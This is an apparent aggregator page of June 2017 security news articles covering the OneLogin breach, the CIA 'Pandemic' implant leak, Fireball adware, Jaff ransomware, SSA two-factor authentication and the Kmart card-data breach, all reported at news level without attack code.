English Articles -

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


 


OneLogin Shares More Details on Breach, Customer Impact

2.6.2017 securityweek Hacking
Identity and access management firm OneLogin has shared more details on the data breach that hit its U.S. data center this week, including information on the method of attack and impact on customers.

OneLogin, whose services are used by more than 2,000 enterprises across 44 countries, informed customers on May 31 that on the same day it had detected and blocked unauthorized access at its U.S. data center.

While the company initially provided only few details, citing an ongoing law enforcement investigation, it did mention that the attackers may have obtained the ability to decrypt encrypted data. This and the long list of actions that customers are required to complete following the incident has led many to believe that the breach was serious.

OneLogin shared more information on Thursday and clarified that the attacker gained access to its systems using compromised Amazon Web Services (AWS) keys. The hacker used the stolen keys to access the AWS API from an intermediate host with a different, smaller US-based service provider.

“Through the AWS API, the actor created several instances in our infrastructure to do reconnaissance,” explained Alvaro Hoyos, CISO of OneLogin.

The attack appears to have started on May 31 at around 2 am PST and the affected AWS instance and the keys leveraged by the hacker were disabled roughly seven hours later after OneLogin staff noticed unusual database activity.

After some OneLogin customers complained about the lack of information on what type of user data has been compromised, the company clarified that the threat actor gained access to a database containing data on users, apps and various types of keys.

“While we encrypt certain sensitive data at rest, at this time we cannot rule out the possibility that the threat actor also obtained the ability to decrypt data. We are thus erring on the side of caution and recommending actions our customers should take, which we have already communicated to our customers,” Hoyos said.

OneLogin previously reported suffering a data breach in August 2016, when the company warned users that hackers may have gained access to unencrypted Secure Notes data.


CIA Tool 'Pandemic' Replaces Legitimate Files With Malware

2.6.2017 securityweek BigBrothers
Documents published by WikiLeaks on Thursday describe a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to spread malware on a targeted organization’s network.

The tool, named “Pandemic,” installs a file system filter driver designed to replace legitimate files with a malicious payload when they are accessed remotely via the Server Message Block (SMB) protocol.

What makes Pandemic interesting is the fact that it replaces files on-the-fly, instead of actually modifying them on the device the malware is running on. By leaving the legitimate file unchanged, attackers make it more difficult for defenders to identify infected systems.

“Pandemic does NOT//NOT make any physical changes to the targeted file on disk. The targeted file on the system Pandemic is installed on remains unchanged. Users that are targeted by Pandemic, and use SMB to download the targeted file, will receive the 'replacement' file,” the tool’s developers said.

Pandemic, which works on both 32-bit and 64-bit Windows systems, is initially installed on machines from which users download or execute files remotely via SMB. According to the documents leaked by WikiLeaks, the tool can replace up to 20 files at a time – each with a maximum size of 800Mb.

Pandemic developers also provide a DLL file that can be used to determine if the tool is installed, and uninstall it. The files published by WikiLeaks contain information that can be useful for checking a system for Pandemic infections. Experts also pointed out that there is an easy way to see if Pandemic is present on a device.


Giuseppe `N3mes1s` @gN3mes1s
Do you wanna know if you have Pandemic? REG QUERY HKLM\SYSTEM\CurrentControlSet\Services\Null . #pandemic #WIKILEAKS https://wikileaks.org/vault7/document/#pandemic …
6:12 PM - 1 Jun 2017
32 32 Retweets 35 35 likes
Twitter Ads info and privacy

WikiLeaks has been publishing CIA files, which are part of a leak dubbed “Vault 7,” every Friday since March 23, except for last week. The tools exposed by the whistleblower organization include ones designed for hacking Samsung smart TVs, MitM tools, a framework used to make malware attribution and analysis more difficult, and a platform for creating custom malware installers.

The fact that WikiLeaks delayed last week’s dump until the day the Russian government once again denied interfering with U.S. elections has led some members of the infosec community to believe that the leaks may be timed to serve other purposes, not just to expose the CIA’s activities.

20h
Jake Williams @MalwareJake
@wikileaks Now @wikileaks releases #pandemic documentation. Two things in hacking news today: Russia claims they don't do it and US definitely does 6/n
Follow
Jake Williams @MalwareJake
@wikileaks As you read the #pandemic dumps,be mindful of the fact that you are being manipulated by whoever controls @wikileaks access to this data 7/n
8:04 PM - 1 Jun 2017
2 2 Retweets 10 10 likes
Twitter Ads info and privacy

Symantec and Kaspersky have found links between the tools exposed by Wikileaks and the malware used by a cyber espionage group tracked as “Longhorn” and “The Lamberts.”


Putin: Patriotic Russians Could Be Behind Election Hacks

2.6.2017 securityweek BigBrothers
Russian President Vladimir Putin says patriotic citizens may have launched politically motivated cyberattacks against foreign countries, but denied any government involvement in such operations.

Following accusations that Russian state-sponsored hackers interfered with the recent elections in the United States, Putin was asked on Thursday at the International Economic Forum in St. Petersburg about the possibility of Russian hackers influencing the upcoming elections in Germany. Putin responded by comparing hackers to artists.

“If artists get up in the morning feeling good, all they do all day is paint,” Putin said. “The same goes for hackers. They got up today and read that something is going on internationally. If they are feeling patriotic they will start contributing, as they believe, to the justified fight against those speaking ill of Russia.”

The Russian president noted that while this is possible in theory, his country does not engage in such activities on a government level. Putin also highlighted that threat actors could launch attacks and make it look like the source was Russia – a task that he described as “very easy.”

On the other hand, Putin said he was convinced that hackers cannot have a real impact on an election campaign.

“We do not engage in this activity at the government level and are not going to engage in it. On the contrary, we try to prevent this from happening in our country,” he said. “At any rate, I believe that no hackers can affect the election campaign in any European country, nor in Asia or in America.”

The United States has officially accused Russia of attempting to interfere with recent elections and an investigation has been launched to assess the impact of the cyberattacks on their outcome.

Thomas Rid, a professor in the department of War Studies at King's College London, believes the comments made by Putin are strategic.

Thomas Rid comments on Putin statement

Russian hackers are also believed to have targeted the political campaign of French President Emmanuel Macron. The attacks were uncovered by security firms, but the U.S. National Security Agency (NSA) also claimed to have warned France of the attacks.

The threat groups tracked as Fancy Bear (aka APT28, Pawn Storm, Sofacy Group, Sednit and STRONTIUM) and Cozy Bear (aka APT29, Office Monkeys and Cozy Duke) are widely believed to be associated with Russia. While many security firms refrain from making statements on attribution or simply point out that the hackers speak Russian, some companies have gone as far as to link them to Russian government agencies, such as the Federal Security Service (FSB), the Foreign Intelligence Service (SVR), and the military intelligence agency GRU.


Facebook Redesigns Security Settings Page

2.6.2017 securityweek Social
Facebook this week announced the roll-out of a redesigned security settings page, meant to make it easier for users to understand the options provided to them.

As part of the redesign, the social networking platform focused on making important settings easily identifiable and more visible to all users. The changes are based on the results of a research the company recently conducted in an effort to better understand how people use security settings on Facebook, Heidi Shin, product manager on the Protect and Care team, explains.

Users accessing Facebook’s security settings page will find items such as two-factor authentication and Trusted Contacts at the top, in a recommended section. The featured recommendations are tailored according to each person’s needs and similar options are grouped into modules for simplified layout and ease of use.

Another important change Facebook made to its security settings was to bring the names of different options in line with those used by other online services. Thus, two-factor authentication is now visible under this name, and not “login approvals,” as before.

“After finding in our research that ‘two-factor authentication’ was the most recognized term, we adjusted the name. By focusing on clarity, we’re making it easier for people to find and enable these features on Facebook as well as other online services,” Shin notes.

Additionally, Facebook decided to completely redesign the “Where you're logged in” module, which now features a simpler format, clearly showing the device, location, and login date and time for each place a user’s logged in.

“We also looked closely at features that people had clicked on but ultimately decided not to enable. We found that it was usually the product description — not the name itself — that was discouraging people from completing the action,” Shin explains.

Users looking to improve their security on the social platform can do so by clicking the arrow in the top right corner of the screen, selecting Settings, and then clicking Security + Login on the left-hand side to access the redesigned page.


OneLogin Password Manager Hacked; Users’ Data Can be Decrypted

2.6.2017 thehackernews Hacking

Do you use OneLogin password manager? If yes, then immediately change all your account passwords right now.
OneLogin, the cloud-based password management and identity management software company, has admitted that the company has suffered a data breach.
The company announced on Thursday that it had "detected unauthorised access" in its United States data region.
Although the company did not provide many details about the nature of the cyber attack, the statement released by the firm suggest that the data breach is extensive.
What Happened? OneLogin, which aims at offering a service that "secures connections across all users, all devices, and every application," has not yet revealed potential weaknesses in its service that may have exposed its users’ data in the first place.
"Today We detected unauthorised access to OneLogin data in our US data region," OneLogin chief information security officer Alvaro Hoyos said in a brief blog post-Wednesday night.
What type of Information? Although it is not clear exactly what data has been stolen in the hack, a detailed post on a support page that is accessible to customers only, apparently says that all customers served by the company's US data centre are affected, whose data has been compromised.
The stolen data also includes "the ability to decrypt encrypted data."
What is OneLogin doing? OneLogin has blocked the unauthorised access to its data centre and is actively working with law enforcement and security firm to investigate the incident and verify the extent of the impact.
"We have since blocked this unauthorised access, reported the matter to law enforcement, and are working with an independent security firm to determine how the unauthorised access happened and verify the extent of the impact of this incident," Hoyos said.
"We are actively working to determine how best to prevent such an incident from occurring in the future."
What Should You Do Now? First of all, change passwords for all your accounts that you have linked with OneLogin.
The company has given customers an extensive list of actions to do to protect themselves and minimise the risk to their data, which includes:
Forcing a password reset for all of its customers.
Generating new security credentials, OAuth tokens, and certificates for apps and websites.
Recycling secrets stored in OneLogin's secure notes.
For any other queries, OneLogin customers can contact the company at security-support@onelogin.com.
You should also particularly be alert of the Phishing emails, which are usually the next step of cyber criminals after a breach. Phishing is designed to trick users into giving up further details like passwords and bank information.
This is the second data breach the company has suffered within a year. In August 2016, a OneLogin suffered a separate data breach in which an unauthorized hacker gained access to one of the company’s standalone systems, which it used for "log storage and analytics."


Putin: Hackers Are Like Artists, Who Wake Up In A Good Mood & Start Painting

2.6.2017 thehackernews BigBrothers

Just control your laughter, while reading this article. I insist.
Talking to international media at the St Petersburg Economic Forum on Thursday, Russian President Vladimir Putin made a number of statement surrounding alleged Russia's involvement in hacking.
If you are not aware, Russia has been the focus of the U.S. investigations for its purported role in interfering with the 2016 US presidential election, which saw several major hacks, including Democratic National Committee and Hillary Clinton campaign emails.
The US authorities and intelligence community concluded in January that Mr. Putin had personally directed cyber attacks against Democrats and the dissemination of false information in order to influence US election and help Mr. Trump win the election.
Putin: Russia Has Never Been Involved in Hacking

Today Mr. Putin denied all the allegations of Russian engagement in the U.S. election hacking, saying that the Russian state had ever been involved in hacking.
I know you would take some time even to digest this statement, but trust me this one is nothing. You would start laughing after reading his other comments mentioned in this article.
"We don't engage in that at the state level," Mr. Putin said, according to the Associated Press.
"I'm deeply convinced that no hackers can radically influence another country's election campaign," Mr. Putin added. "No hackers can influence election campaigns in any country of Europe, Asia or America."
So, Putin, who limits the freedom of the press and is accused of killing political opponents and journalists to prevent them from reporting on topics that can anger the Kremlin, is saying that "no information will change the minds of the people or influence the outcome" of the election.
Putin: Patriotic Hackers May Have Targeted U.S. Election

Besides insisting that the Russian government has no involvement in such cyber attacks, Mr. Putin said that some individual "patriotic" hackers who love their country could mount such attacks against those who "speak negatively about" their country.
"If they are patriotically minded, they start making their contributions – which are right, from their point of view – to fight against those who say bad things about Russia," Mr. Putin said.
Is he just encouraging hackers to conduct cyber attacks against rival nations by making such comments?
As for his dealings with US President Donald Trump, Mr. Putin also said Moscow would wait for the current political storm in the United States to settle down before he attempts to forge constructive relations with Mr. Trump, whom he praised for being "straightforward" with "fresh set of eyes."
Putin: Hackers are Like Artists, Who Wake Up and Start Painting!

"Hackers are free people, just like artists who wake up in the morning in a good mood and start painting," Mr. Putin said.
"The hackers are the same, they would wake up, read about something going on in interstate relations and if they have patriotic leanings, they may try to add their contribution to the fight against those who speak badly about Russia."
So, Mr. Putin wants to say that hackers can contribute to their nation by attacking their country’s rivals. WOW!
Describing hackers as free-spirited artists acting according to their moods, Mr. Putin said cyber attacks on DNC and Hillary Clinton presidential campaign could be made to look like they had come from Russia when they hadn't actually.
"I can imagine that some do it deliberately, staging a chain of attacks in such a way as to cast Russia as the origin of such an attack," Mr. Putin added. "Modern technologies allow that to be done quite easily."
Mr. Putin's remarks are similar to the ones from Mr. Trump, who has previously dismissed accusations of Russian involvement in the DNC hack and said that the hacks could be by "somebody sitting on their bed that weighs 400 pounds."
While Mr. Putin may deny the hacking allegations, which he believes are "not based on facts," many cyber security and espionage experts have discovered that Russia has in the past "outsourced" its hacking efforts to state-sponsored criminal gangs.


#Vault7: CIA Pandemic implant turns file servers into malware infectors
2.6.2017 securityaffairs BigBrothers

Wikileaks released a new lot of documents belonging to the Vault7 dump that details the CIA project codenamed ‘Pandemic implant’
Wikileaks released a new batch of documents belonging to the Vault7 archive related to the CIA project codenamed ‘Pandemic.’


WikiLeaks ✔ @wikileaks
RELEASE: CIA 'Pandemic' Windows infection malware documentation #Vault7 https://wikileaks.org/vault7/#Pandemic …
7:34 PM - 1 Jun 2017
1,713 1,713 Retweets 1,554 1,554 likes
Twitter Ads info and privacy
The Pandemic CIA project refers a Windows persistent implant that share files (programs) with remote users in a local network. Pandemic is used by the cyber spies to infect remote users by replacing application code on-the-fly with a trojaned version if the application that is retrieved from the infected machine.

“Today, June 1st 2017, WikiLeaks publishes documents from the “Pandemic” project of the CIA, a persistent implant for Microsoft Windows machines that share files (programs) with remote users in a local network.” reads the description published by Wikileaks.”‘Pandemic’ targets remote users by replacing application code on-the-fly with a trojaned version if the program is retrieved from the infected machine.”

The implant transforms file servers into machines that infect PCs which access them remotely.

A computer on a local network with shared drives that is infected with the Pandemic implant is the medical equivalent of a Patient Zero in Medical science that spreads a disease. It will compromise remote computers if the user executes applications stored on the pandemic file server.

pandemic implant

The Pandemic tool doesn’t change the file on the infected system when victims request a file from it, they will receive a trojanized replacement of the legitimate application.

The Pandemic implant can replace up to 20 programs, with a maximum size of 800MB.

“Pandemic is a tool which is run as kernel shellcode to install a file system filter driver. The filter will ‘replace’ a target file with the given payload file when a remote user accesses the file via SMB (read-only, not write).” reads the Pandemic Implant tool summary. “Pandemic will not ‘replace’ the target file when the target file is opened on the machine Pandemic is running on. The goal of Pandemic is to be installed on a machine where remote users use SMB to download/execute PE files. (S//NF) Pandemic does NOT//NOT make any physical changes to the targeted file on disk. The targeted file on the system Pandemic is installed on remains unchanged. Users that are targeted by Pandemic, and use SMB to download the targeted file, will receive the ‘replacement’ file.”

The Pandemic Data leak contains five files, the installation of the implant is very rapid. it just takes between 10 to 15 seconds.
The documentation does not provide information about the infection process, it is not specified if infected machines become new pandemic servers.

Let’s wait for the next Vault


Beware! Fireball Malware Infects Nearly 250 Million Computers Worldwide
1.6.2017 thehackernews Virus
Security researchers have discovered a massive malware campaign that has already infected more than 250 million computers across the world, including Windows and Mac OS.
Dubbed Fireball, the malware is an adware package that takes complete control of victim's web browsers and turns them into zombies, potentially allowing attackers to spy on victim's web traffic and potentially steal their data.
Check Point researchers, who discovered this massive malware campaign, linked the operation to Rafotech, a Chinese company which claims to offer digital marketing and game apps to 300 million customers.
While the company is currently using Fireball for generating revenue by injecting advertisements onto the browsers, the malware can be quickly turned into a massive destroyer to cause a significant cyber security incident worldwide.
Fireball comes bundled with other free software programs that you download off of the Internet. Once installed, the malware installs browser plugins to manipulate the victim's web browser configurations to replace their default search engines and home pages with fake search engines (trotux.com).
"It's important to remember that when a user installs freeware, additional malware isn't necessarily dropped at the same time." researchers said. "Furthermore, it is likely that Rafotech is using additional distribution methods, such as spreading freeware under fake names, spam, or even buying installs from threat actors."
The fake search engine simply redirects the victim's queries to either Yahoo.com or Google.com and includes tracking pixels that collect the victim's information.

Far from legitimate purpose, Fireball has the ability to spy on victim's web traffic, execute any malicious code on the infected computers, install plug-ins, and even perform efficient malware dropping, which creates a massive security hole in targeted systems and networks.
"From a technical perspective, Fireball displays great sophistication and quality evasion techniques, including anti-detection capabilities, multi-layer structure, and a flexible C&C– it is not inferior to a typical malware," researchers said.
At the current, Fireball adware is hijacking users' web traffic to boost its advertisements and gain revenue, but at the same time, the adware has the capability to distribute additional malware.
"Based on our estimated infection rate, in such a scenario, one out of five corporations worldwide will be susceptible to a major breach," researchers added.
According to researchers, over 250 million computers are infected worldwide, 20 percent of them are corporate networks:
25.3 million infections in India (10.1%)
24.1 million in Brazil (9.6%)
16.1 million in Mexico (6.4%)
13.1 million in Indonesia (5.2%)
5.5 million In US (2.2%)
"How severe is it? Try to imagine a pesticide armed with a nuclear bomb. Yes, it can do the job, but it can also do much more," researchers warned. "Many threat actors would like to have even a fraction of Rafotech's power."
Warning Signs that Your Computer is Fireball-Infected
If the answer to any of the following questions is "NO," that means your computer is infected with Fireball or a similar adware.
Open your web browser and check:
Did you set your homepage?
Are you able to modify your browser's homepage?
Are you familiar with your default search engine and can modify that as well?
Do you remember installing all of your browser extensions?
To remove the adware, just uninstall the respective application from your computer (or use an adware cleaner software) and then restore/reset your browser configurations to default settings.
The primary way to prevent such infections is to be very careful when you agree to install.
You should always pay attention when installing software, as software installers usually include optional installs. Opt for custom installation and then de-select anything that is unnecessary or unfamiliar.


Fireball Malware Infects 250 Million Computers

1.6.2017 securityweek  Virus
A newly discovered piece of malware managed to infect more than 250 million computers in a widespread campaign run by a Chinese digital marketing agency, Check Point researchers warn.

Dubbed Fireball, the malware can take over the targeted browser, run arbitrary code on a victim’s computer, and spy on victims. Thus, its operators can download any file or malware onto the machine, and can also manipulate the infected user’s web traffic to generate ad revenue.

“Currently, Fireball installs plug-ins and additional configurations to boost its advertisements, but just as easily it can turn into a prominent distributor for any additional malware,” Check Point says.

The campaign, the security company reveals, is run by a large digital marketing agency based in Beijing, called Rafotech. With the help of this malware, the agency manipulates the victims’ browsers to turn search engines and home-pages into fake search engines, redirect queries to Yahoo.com or Google.com, and collect victims’ private information via tracking pixels included in the fake search engines.

Rafotech’s fake search engines have high popularity, with 14 of them ranked among the top 10,000 websites, some occasionally reaching top 1,000. Despite denying the use of browser-hijackers and fake search engines, Rafotech claims to have 300 million users worldwide, a number similar to the estimated infections.

To date, Fireball has infected over 250 million computers worldwide, being distributed mainly bundled with legitimate programs. India (25.3 million infections) and Brazil (24.1 million) were hit the most, followed by Mexico (16.1 million), and Indonesia (13.1 million). A total of 5.5 million infected machines are located in the United States.

Check Point also says that 20% of all corporate networks have been affected. Indonesia (60%), India (43%) and Brazil (38%) were hit the most. The hit rate in the US is of 10.7%, while reaching only 4.7% in China.

Related reading: China, U.S. Most Affected by WannaCry Ransomware

As a browser-hijacker, Fireball is capable of driving victims to malicious sites, spying on them, and also successfully dropping malware onto their machines. The malware also “displays great sophistication and quality evasion techniques, including anti-detection capabilities, multi-layer structure and a flexible C&C,” Check Point says.

Thus, Fireball provides Rafotech with a potent backdoor that can be further exploited, the security researchers point out.

By using digital certificates, Fireball’s distribution can appear legitimate, and “Rafotech carefully walks along the edge of legitimacy,” Check Point says. For that, the company uses bundling, where a wanted program installs additional software, either with or without user’s consent.

Rafotech’s distribution methods, however, don’t follow criteria that would allow for them to be considered legal. The malware and the fake search engines, on the other hand, don’t carry indicators that could connect Rafotech to them. They can’t be uninstalled by an ordinary user either, and they conceal their true nature.

For distribution purposes, the malware is believed to be bundled with other Rafotech products, such as Deal Wifi and Mustang Browser, or with products such as “Soso Desktop”, “FVP Imageviewer” and other software from freeware distributors. The distribution of freeware under fake names, spam, or even buying installs from threat actors might have also helped Rafotech in its distribution efforts.

“It’s important to remember that when a user installs freeware, additional malware isn’t necessarily dropped at the same time. If you download a suspicious freeware and nothing happens on the spot, it doesn’t necessarily mean that something isn’t happening behind the scenes,” Check Point says.

Other browser-hijackers that behave similarly have been also discovered, including one designed by ELEX Technology, a company that builds software similar to that of Rafotech’s and supposedly related to it (either in the distribution of hijackers or in the trading of customer data).

Having a great sensitive information-harvesting potential, Fireball and similar browser-hijackers can pose a huge threat to users and organizations worldwide, provided that Rafotech (or a similar company) decides to indeed gather user information. It could steal banking and credit card credentials, medical files, patents and business plans, and other type of sensitive information.

“Based on our estimated infection rate, in such a scenario, one out of five corporations worldwide will be susceptible to a major breach. Severe damage can be caused to key organizations, from major service providers to critical infrastructure operators to medical institutions. The potential loss is indescribable, and repairing the damage caused by such massive data leakage (if even possible) could take years,” Check Point says.

While this is not a typical malware attack, the campaign has a huge potential to cause harm, and should be blocked, the security company says. Check Point also provides instructions on how users can remove the malware and add-ons from their machines (for both Windows and Mac users).


Crowdfunding for Acquiring Shadow Brokers Exploits Canceled

1.6.2017 securityweek  Exploit

Researchers announced this week the launch of a crowdfunding initiative whose goal was to raise money to subscribe to the Shadow Brokers’ monthly exploit leaks. However, the funding campaign has been canceled due to legal reasons.

The hacker group called Shadow Brokers announced on Tuesday that interested parties can obtain exploits and information by paying a monthly fee of 100 Zcash (roughly $20,000). The hackers claim they possess a lot of data allegedly stolen from the NSA-linked Equation Group, including exploits, SWIFT network data, and information on nuclear and missile programs in Russia, China, Iran and North Korea.

A group led by Hacker House co-founder Matthew Hickey and the researcher known online as “x0rz” launched a Patreon-based crowdfunding campaign to raise the 100 Zcash needed to subscribe to the Shadow Brokers’ monthly dumps.

The plan was to immediately notify affected vendors of any zero-day exploits in hopes of avoiding another attack similar to the WannaCry ransomware, which leveraged a Windows SMB exploit leaked by Shadow Brokers. While Microsoft patched the flaw in March, weeks before the WannaCry attacks, many companies were not aware of the risks and neglected to patch it.

Hickey conducted a survey to get the infosec community’s view on the crowdfunding idea, and just over half of the roughly 1,800 votes supported the initiative. Some industry professionals pointed to the legal and ethical implications, while others noted that the Shadow Brokers have likely already leaked all the valuable exploits, or that they will leak the data anyway as they are simply doing it for the attention.

The project raised nearly $4,000 in just 36 hours, but the initiators of the campaign decided to pull the plug after seeking legal advice. The pledged bitcoins will be refunded or donated to the Electronic Frontier Foundation (EFF).

“If you ever want to hear a lawyer shout expletives at volume down a phone you need to call him and tell him that you have created the first open source crowd-funded cyber arms acquisition attempt,” Hickey said. “It transpires that should funds change hands from ours to the Shadow Brokers we would be certainly risking some form of legal complications. It was just too risky and the advice was under no circumstances to proceed further with this.”

While it’s still not clear who is behind the Shadow Brokers – some point to Russia, while others to an NSA insider – Hickey said he learned that the group is linked to Russia’s Federal Security Service (FSB), which complicated the situation even further.

The Shadow Brokers have denied having anything to do with Russia and they claim their main goal is to make money. However, all their attempts, including auctions and crowdfunding initiatives, have so far failed. It remains to be seen if anyone signs up for their monthly dump service.

In the meantime, The Washington Post reported – and confirmed speculation – that it was the NSA who informed Microsoft about the Windows vulnerability exploited by WannaCry. The infosec community has been urging the intelligence agency to disclose the Equation Group exploits to affected vendors given that they could be made public at any time.


Dark Web users of a child porn website tracked after visiting file sharing site
1.6.2017 securityaffairs CyberCrime

The U.S. Department of Homeland Security has identified dark web users after they downloaded media through a file sharing services.
The DHS obtained the IP addresses of several suspects that visited a child porn site hosted in the Tor network.

According to court filings, the suspects shared links to password-protected child pornography media on the Ziifile file sharing service available in the Internet.
The court order doesn’t explicitly report the name of the child porn website that was referred by the investigators as “Bulletin Board A,” a popular hidden service with more than 23,000 users.

“Bulletin Board A had over 1,500 “approved users,” who actively posted new content and engaged in online discussions involving the sexual exploitation of minors. In general, members would post preview images and download links to several different cloud-based storage services.” reads the court order. “Among other things, these posts contained the “Bulletin Board” means an Internet-based website that is either secured (accessible with a password) or unsecured, and provides members with the ability to view postings by other members and make postings themselves”
The investigators tracked all the users that accessed the links to obtain the archive containing child porn material hosted in the dark web.

“The Department of Homeland Security was able to gain crucial information on several child pornography website users without resorting to highly specialized methods, such as deploying special exploits or new techniques.” reads Darkwebnews.com.

The technique used by the law enforcement is very trivial and doesn’t rely on any exploit code to de-anonymize Tor users.

This case demonstrated that a wrong use of anonymizing services could expose users’ identities.

The authorities also obtained from the file sharing service data related to the users’ downloads posted by members of the dark web pornography website.

According to Motherboard, law enforcement has already arrested three suspects that accessed the file sharing website to download child port material from the dark web website.


Decoy Files Found in PDFs Dropping Jaff Ransomware

1.6.2017 securityweek Ransomware
Spam campaigns distributing the Jaff ransomware have evolved and are using multiple decoy files hidden inside malicious PDF attachments, Trustwave security researchers say.

Jaff is a new ransomware family that emerged in early May, and has been distributed through the infamous Necurs spam botnet. After fueling a surge in malicious spam last year, Necurs went dark in December 2016, only to return in April 2017.

The Locky ransomware, historically associated with spam emails distributed by the Necurs botnet, went silent in December as well, and made only a brief return in April. As of early May, Necurs switched to distributing the Jaff ransomware and continues to do so.

The reason for this appears to be simple: Jaff was supposedly developed by the same group behind Locky and Dridex, considering the use of resources previously associated with these threats. The first Jaff variant even used a ransom note similar to Locky’s, but the second variant adopted a redesigned one, along with few other changes.

The distribution campaign uses PDF files attached to the spam emails, but with Word documents hidden inside. The email subject ranges from fake invoice notifications to fake payment receipts, and from alleged image scans to random file copies.

The ultimate goal remains the same: the Word document inside the PDF file is meant to download and drop a malware executable. According to Trustwave, however, the PDF campaigns have been evolving almost daily, with a larger number of embedded files discovered inside recent attachments and with additional layers of obfuscation.

“These additional files do nothing, and are probably just decoys. But the main .docm file, with its malicious macro, still acts as the malware downloader,” Trustwave’s Homer Pacag explains.

The PDF file contains an exportDataObject Launch instruction to drop and launch the embedded .docm file. When enabled, the Word document’s vbaProject macro component starts downloading the Jaff ransomware from a specific URL.

Over the past week or so, the Jaff variant being delivered via Necurs appends the .wlu extension to the encrypted files (the initial variant was using the .jaff extension). However, it continues to use the same URL to guide victims to where they can recover their encrypted files.


Social Security Administration Adopts What NIST is Deprecating

1.6.2017 securityweek Social
As of June 10 2017, users of the Social Security Administration (SSA) website will be required to use two-factor (2FA) authentication to gain access. Potentially, this could affect a vast number of American adults, who will be required to enter both their password and a separate code sent to them either by SMS or email text.

What is surprising is that in July 2016, NIST deprecated SMS-based 2FA in special publication 800-63B: Draft Digital Identity Guidelines. It should be noted this is still a draft, and not yet a formal standard that government agencies are required to meet; but nevertheless, it specifically says, "OOB [2FA] using SMS is deprecated, and may no longer be allowed in future releases of this guidance." It seems strange, then, that the SSA should introduce precisely what NIST deprecates.

NIST has chosen to denounce SMS because it is flawed, and not just because there are stronger alternatives. Publication 800-63B stresses, "Due to the risk that SMS messages may be intercepted or redirected, implementers of new systems SHOULD carefully consider alternative authenticators" (section 5.1.3.2). This is not a hypothetical risk. German newspaper Suddeutsche Zeitung reported on May 3, 2017 that criminals had relied on Signaling System No. 7 (SS7) attacks to bypass two-factor authentication systems and conduct unauthorized wire transfers.

SS7 is an underlying mobile telephony protocol deeply embedded in the worldwide mobile telephony system. It was developed in 1975, without much regard to security, to allow easy signal transfer between towers. "It is full of flaws," explains Martin Zinaich, information security officer at the City of Tampa. "Most of those flaws are 'by design' to keep calls connected from tower to tower. It doesn’t make sense to utilize 2FA when that second factor is so easily breached." And it is unlikely that SS7 will ever be fixed.

The initial plan from the SSA had been to offer only SMS-based 2FA. "Last summer," explains Jim Borland, acting deputy commissioner for communications in a blog post early this month, "we added a second way for us to check your identity when you registered or signed in to my Social Security. However, at that time, we only allowed the use of a cell phone as your second identification method. We listened to your concerns, and beginning on June 10, you can choose either your cell phone or your email address as the second way for us to identify you. Since an email address is already required to use my Social Security, everyone can continue to benefit from the features my Social Security provides."

The problem was that many of the SSA's 30 million users did not have SMS-capable phones. "The initial rollback of last year's plan to use SMS messages as the sole means to receive a one-time passcode was done due to, primarily, a convenience issue, since most users of the SSA website were found to not have phones capable of receiving SMS messages," explains Nathan Wenzler, chief security strategist at consulting firm AsTech. "Some estimates suggested that up to two-thirds of users would be affected in this way."

But he continued, "Adding the option to receive an email does not add any additional security, either, as email accounts can also be compromised in many ways, allowing an attacker to intercept the one-time passcode sent to a user's inbox as well. Is the SSA meeting [current] policy requirements? Yes. Are they creating a more secure site for their users? Not really."

Chris Roberts, chief security architect at threat detection firm Acalvio is just as damning. "I won't sugarcoat this: of all of those that could be affected, seniors are the most wary of text messages, especially when so many damn scams come across as text messages these days. Therefore, this might not be the best solution. The fact that it's been proven several times that a text 2FA does little to help combat fraud means that there's still a lot that the SSA needs to do."

The SSA, however, is in a difficult position. It provides a necessary service to a large number of citizens, many of whom were born before the technology and internet revolution. Some have never adapted, but still rely on the SSA. In order to maintain its service to all its customers, it is forced to adopt the lowest common denominator for its 2FA. Normally, this would be SMS 2FA -- but for the SSA's particular range of customers, even that is too high. It supplemented SMS with email text. The result is simply a weak and vulnerable form of authentication, albeit stronger than passwords alone. "Using email as a way to verify Americans," comments Marc Boroditsky, VP and GM of Authy, "is, at best, misguided, and, at worst, a high-risk attack vector for massive fraud."

Could it have done better? Yes, says Boroditsky. "Even if someone's phone number isn't text-enabled, you can still do phone number verification or 2FA over a simple voice call to that person. And with regard to 'technical complexity' of 2FA, this should be really straightforward. I've seen developers build a verification app in 5 minutes that works with nearly every phone on the planet."

But flawed 2FA is not the only SSA departure from NIST's draft guidelines. NIST takes the view that password length is more important than password complexity. "Since the size of a hashed password is independent of its length, there is no reason not to permit the use of lengthy passwords (or pass phrases) if the user wishes." This allows the user to use a phrase based on, for example, a favorite line of poetry: easy for the user to remember, hard for the criminal to crack. "Allow at least 64 characters in length to support the use of passphrases," recommends NIST. "Encourage users to make memorized secrets as lengthy as they want, using any characters they like (including spaces), thus aiding memorization." But the SSA website currently accepts passwords of between only 7 and 20 characters.

If NIST's draft guidelines become reality unchanged, the SSA will have much to do. It will know this. It might be expecting an exemption; or the current changes might simply be a holding-exercise while it develops a better system more in line with NIST's expectations. What other factors could the SSA adopt? Tom Conklin, Sr. director of security & compliance at Vera, comments, "That's a challenge because nothing is perfect, not everyone has a cell phone, email can be compromised, and private keys can be stolen. One approach would be for the social security to adopt an open standard like FIDO universal second factor. This way anyone with a FIDO compatible device or app could use it with the Social Security website.


Kmart Payment Systems Infected With Malware

1.6.2017 securityweek Virus
Big box department store chain Kmart informed customers on Wednesday that cybercriminals may have stolen their credit or debit card data after installing malware on the company’s payment processing systems.

Kmart, a subsidiary of Sears Holdings, has not provided any information on which stores are affected and for how long hackers had access to its systems. The retailer operates more than 700 stores, but blogger Brian Krebs learned from his sources in the financial industry that the breach does not appear to impact all locations.

It’s unclear what point-of-sale (PoS) malware has been used in the attack, but the retailer has described it as “a new form of malware” and “undetectable by current antivirus systems.”

The company’s investigation showed that names, addresses, social security numbers, dates of birth, email addresses and other personally identifiable information (PII) have not been compromised. Kmart believes the attackers may have only accessed payment card numbers.

“All Kmart stores were EMV ‘Chip and Pin’ technology enabled during the time that the breach occurred, and we believe the exposure to cardholder data that can be used to create counterfeit cards is limited,” said Gareth Glynne, senior VP of retail operations at Sears & Kmart. “There is no evidence that kmart.com or Sears customers were impacted nor that debit PIN numbers were compromised.”

Kmart is working with law enforcement authorities, banking partners and cyber security firms to investigate the incident. The retailer is not offering any credit monitoring services to affected customers given that only limited information has been exposed, but it has advised them to review and monitor their payment card statements.

